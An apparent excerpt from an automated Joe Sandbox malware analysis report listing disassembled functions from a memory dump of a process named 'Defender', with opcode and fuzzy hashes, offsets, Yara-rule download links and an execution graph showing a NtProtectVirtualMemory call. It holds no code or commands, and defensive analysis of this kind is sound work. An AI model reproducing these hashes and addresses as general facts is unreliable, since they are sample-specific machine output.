                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f555aea58df54ee3133da248fb0d5a8374419d8dd270212db17f9e516fcc95
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50517131918A1C8FDB58EF58D845BE9BBF1FB59310F0082AAD44DD3252DF34A9858F81
                                                                                                                                                                                                                                            Function 00007FF848F306D0 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0a48ed6e9d8ddba94af96a8b240a6ea04ad34e7c21d7f3257fc8248d784e428b
                                                                                                                                                                                                                                            • Instruction ID: c84e49f7e1c6cb0b9cac8431f6109eca6dfbc4c47841d13f61742d1ce6183cf1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a48ed6e9d8ddba94af96a8b240a6ea04ad34e7c21d7f3257fc8248d784e428b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5251DA31F2DA058FF35C672CA84A675B7D2EBA8791F14417FE40DC32D2DD28AC82425A
                                                                                                                                                                                                                                            Function 00007FF848F30FA0 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 98afe6e4aa6404519c8a021cd689e547d70f458e4753efdf1bcf9bae2030b2fd
                                                                                                                                                                                                                                            • Instruction ID: e7551bf908ee2f15c6f27a51e2d3243914ec1418ba7cd58d4e0bb1847256156e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98afe6e4aa6404519c8a021cd689e547d70f458e4753efdf1bcf9bae2030b2fd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C51F731D1DA891FF35AB738884A5763BD9EB96750F04007EE48EC31D3EE5868438366
                                                                                                                                                                                                                                            Function 00007FF848F2F28A Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 31d848de3017d2af46aef39b56ca21390736fd12a47f1a45120c823f5295fb45
                                                                                                                                                                                                                                            • Instruction ID: 2c2b7a4dc3a20b24614d36ad5a38599fb4398933baf32702bc96bcab9a604e13
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d848de3017d2af46aef39b56ca21390736fd12a47f1a45120c823f5295fb45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6512430D2DA9A4FE7A6B378A4252B93AE1EF49750F4800BAC80DD71D3DF1E5C068356
                                                                                                                                                                                                                                            Function 00007FF848F2E0F2 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ec26adff78f023c41c044b580d1bdad1e334f33985c05370ee80a9a9ec316c36
                                                                                                                                                                                                                                            • Instruction ID: 11c58e006edf10f67587e6c5045bad6fc5b2623590d4d0de15c62d2ac4bc6a88
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec26adff78f023c41c044b580d1bdad1e334f33985c05370ee80a9a9ec316c36
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7451C231E1D9194FEB98FB2CA8896B873E1EF58751F54007AD40DD32D3DE2A9C418758
                                                                                                                                                                                                                                            Function 00007FF848F25200 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 73a2a6e893355677028499954cfddc488607ac1df6d42431a20d6d84ecae74a2
                                                                                                                                                                                                                                            • Instruction ID: 39056edb13004afb4450205bed49c3471db3edae0376ed5bcdddf291f7fe2e44
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73a2a6e893355677028499954cfddc488607ac1df6d42431a20d6d84ecae74a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2641C231E2D9194FEB98FB2CA4856B973E1EF48791F540079E40ED32D3DE2AAC418758
                                                                                                                                                                                                                                            Function 00007FF848F302E9 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1303161ec09e2739bc200b9e4e66b1c3e206c2c511353a5e359cf64b103acfb8
                                                                                                                                                                                                                                            • Instruction ID: cbb3c381ed9c3090eabeb43a4b24db34f3c65291941b92d1990229b1cecb2389
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1303161ec09e2739bc200b9e4e66b1c3e206c2c511353a5e359cf64b103acfb8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A517B31D1CA598FEB84FB68E4656E877E1FF99350F0904BAD80DD72D2DB28AC018745
                                                                                                                                                                                                                                            Function 00007FF848F25208 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 48ea3833b1d3ed4341a536a3618f35fa2368c6057e198d7ec5e7a94bbda79d7c
                                                                                                                                                                                                                                            • Instruction ID: d0561d89459f897c7ebf22d83402f7ac65fd15b57723ad13f5c0e97306c719c0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48ea3833b1d3ed4341a536a3618f35fa2368c6057e198d7ec5e7a94bbda79d7c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F41C231E2C9194FEB98FB2CA4856B973D1EF48751F540079E40ED32D3DE2AAC418758
                                                                                                                                                                                                                                            Function 00007FF848F2F04E Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8c10f8de377c87a3aeeaa7f65a4622160f62dd5acc7af92d0bc92037be099389
                                                                                                                                                                                                                                            • Instruction ID: 9ea387337d40f7c0ca48175380d71340fda43ab823396d2cc52263c1dfb730d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c10f8de377c87a3aeeaa7f65a4622160f62dd5acc7af92d0bc92037be099389
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18515F30E2D81A9FEB94FB68E4956B873E2EF58781F800075D80ED32D6DF296C418744
                                                                                                                                                                                                                                            Function 00007FF848F30D20 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 85f17cde8d69f962dc21d42b7529759744af583085c1e4b9cd8274c7d23ff61e
                                                                                                                                                                                                                                            • Instruction ID: f514055c1a3c220d6152cb15218c3ff8bab642b80baf938437054bd98a6077ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f17cde8d69f962dc21d42b7529759744af583085c1e4b9cd8274c7d23ff61e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E416F31F1C90D8FEB95F7689459AB836E2FF99351F59007AE04EC32D2EF2898818705
                                                                                                                                                                                                                                            Function 00007FF848F2F09F Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8792e25c7915e1621d4114b1592805bebc453c1b20afc1a48aca7c44718d7e80
                                                                                                                                                                                                                                            • Instruction ID: b2d091a5fedbbc488c3401030d388c1c6a5ee71e781659cd49ebd42a17d4e57b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8792e25c7915e1621d4114b1592805bebc453c1b20afc1a48aca7c44718d7e80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C416F31E2891A9FEBA4FB68E8556BCB2E1FF48341F800179D80DD32E6DF296C418744
                                                                                                                                                                                                                                            Function 00007FF848F2DFA8 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0527c6f33063f1a639fc5b82607cb9e8fda4fdca94a993a75cbbc0522bab3068
                                                                                                                                                                                                                                            • Instruction ID: 456219f0381edb005c2df5568024cbaddc79b669ffb7fa1cbe1a85d6342ac920
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0527c6f33063f1a639fc5b82607cb9e8fda4fdca94a993a75cbbc0522bab3068
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89418B31E599198FEBA4FB68A4466B973E2FF98380F640475D40DD32C2DB3AA8418645
                                                                                                                                                                                                                                            Function 00007FF848F30B78 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 477f9fe84e0847481ea8ae597eef716f0835cdddff1e7600f18f4f94b1c720cd
                                                                                                                                                                                                                                            • Instruction ID: 798b86c4015e45e5b1bef5bec030c8c567c7399e1927638ece2345049a36faac
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 477f9fe84e0847481ea8ae597eef716f0835cdddff1e7600f18f4f94b1c720cd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6031EF31E1D8594FEB95B76894586BC7AE1EF99390F180077E00EC31D2DF2C68828745
                                                                                                                                                                                                                                            Function 00007FF848F27171 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: aff400d3bdb67d704e70b8d93ec1417cb7760c9cccf47b090339a11ad959b396
                                                                                                                                                                                                                                            • Instruction ID: 13201bb70f93a958855fb2463388bd009c272c6a89030a64a4a63aa42ac3af5a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aff400d3bdb67d704e70b8d93ec1417cb7760c9cccf47b090339a11ad959b396
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9414261E1E6471EE75573BC30266BF5DA19F81381F90447CE04DCB6CBEE6EAA014329
                                                                                                                                                                                                                                            Function 00007FF848F2E710 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 52af82d9925842bc7e8c44bd17984d7256d7c94471d28b91cc6d825682e0d5ee
                                                                                                                                                                                                                                            • Instruction ID: 462908e484fb281d9f080a816f84c4d8b652ba3c730441cdcf0a2d3053230b9c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52af82d9925842bc7e8c44bd17984d7256d7c94471d28b91cc6d825682e0d5ee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32314032E1D99A8FF795B73CA4591B8ABD1EF14780F1900B6C40CC71D3CE0A5C098346
                                                                                                                                                                                                                                            Function 00007FF848F2F7ED Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c66857c3076c7ff99c7b9321b7d9bf9144f0b1efa1a402316e1609173dd9c5b8
                                                                                                                                                                                                                                            • Instruction ID: d403411612f545c8952e64ba90078fad9c209017a817c7bd4f68a12c772a0129
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c66857c3076c7ff99c7b9321b7d9bf9144f0b1efa1a402316e1609173dd9c5b8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B316B31E2C95D8FEB94EB68A849AECBBE1EF58350F150076D40DD32D2DB2968808785
                                                                                                                                                                                                                                            Function 00007FF848F30B80 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 40fd2e55edb305b0c99d4e41d80a13eaa1b00698be62b3a7a6d4ec78d418b91a
                                                                                                                                                                                                                                            • Instruction ID: de7741d1d800b4d474d00ccacc9b4ad3195797c1a38262672aa8913cd392833a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40fd2e55edb305b0c99d4e41d80a13eaa1b00698be62b3a7a6d4ec78d418b91a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221C321E1D94A4FF7A97378A8552B826C1EF85390F59407BE84EC31C2EF4C9C920399
                                                                                                                                                                                                                                            Function 00007FF848F301EC Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e1f30ca163b1bc071df0d574a9b50c9edfe79d6c163d19286dbfb0d78abd248a
                                                                                                                                                                                                                                            • Instruction ID: f20519f600bb24e0011e225a586aa86c58c7b93deffd7498bca96b1210d579ef
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1f30ca163b1bc071df0d574a9b50c9edfe79d6c163d19286dbfb0d78abd248a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D218B31D6C92A8EEB94F768D445AF9B3D1EB88360F41047AD85DD32C2CE29AC408385
                                                                                                                                                                                                                                            Function 00007FF848F2E831 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d307c9f6e301aa2c7c4fa51469ea692fd57ad515b2be1797e34f7cc9879accdb
                                                                                                                                                                                                                                            • Instruction ID: f546194c030e921ed6faf1f3d95506b22cc74fe1d60769e795667dfd7c1a7832
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d307c9f6e301aa2c7c4fa51469ea692fd57ad515b2be1797e34f7cc9879accdb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD218E31D0C54D8FEB59BB68A4556F977E0EF44380FA4407AE48DD21C2CF2AA8448B85
                                                                                                                                                                                                                                            Function 00007FF848F2E8EF Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a172e77dfc2cbb36ff745453191682f29808668efd5df2f3a97e535a5e1bf103
                                                                                                                                                                                                                                            • Instruction ID: abd2d083f14af029938563eb15b671a60f987a7e14a002564493658ebe31ad32
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a172e77dfc2cbb36ff745453191682f29808668efd5df2f3a97e535a5e1bf103
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5E02632C4D94D8FDB84BBA9AC026E53BA0FF09308F10006AD14CC71C3D73A5A90C386
                                                                                                                                                                                                                                            Function 00007FF848F30C10 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c436f7e84f19a96f31725fab560204e6a1126d0bac4bdbf656c99bd04c0e55a2
                                                                                                                                                                                                                                            • Instruction ID: 815f6ff4511ee64a68773353ca363266c7b8280da3629b4d141016b95ca611aa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c436f7e84f19a96f31725fab560204e6a1126d0bac4bdbf656c99bd04c0e55a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DE01A30D1C91A8FFAB0B728D0845B872D0EF19391F1515B2F00DC72D5DA19ECC14345
                                                                                                                                                                                                                                            Function 00007FF848F30AAA Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 32f62de7a1e9a5a90133ce0fe70582ac49d1f3623cdf36dc17d67bf60ac86840
                                                                                                                                                                                                                                            • Instruction ID: b28f9594783dd356fbb4c1848e76cd05d750c262a92c89d86b0311f21ee91411
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32f62de7a1e9a5a90133ce0fe70582ac49d1f3623cdf36dc17d67bf60ac86840
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7D05E32B1C5140AFB0CA65CB8431FCB392EBC8230F04143BE64AA2182DD1928220199
                                                                                                                                                                                                                                            Function 00007FF848F25D3A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 259900421e13e3c74cc2d99e55795fd7e8f05f4ffee60adff19e464d9ca08bd0
                                                                                                                                                                                                                                            • Instruction ID: 7c981d3e298e5e952431e7a8bad33bcb82af8e9a608a8bc2587647294c93580a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 259900421e13e3c74cc2d99e55795fd7e8f05f4ffee60adff19e464d9ca08bd0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FD0523080650DAADB40EB58A4111EEBAB0FF48300F8000B9A40CA2282CF392A408B08

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:17.9%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:100%
                                                                                                                                                                                                                                            Total number of Nodes:3
                                                                                                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                                                                                                            execution_graph 6794 7ff848f317cd 6795 7ff848f317df NtProtectVirtualMemory 6794->6795 6797 7ff848f318b5 6795->6797

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FF848F317CD Relevance: 2.1, APIs: 1, Instructions: 566nativeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
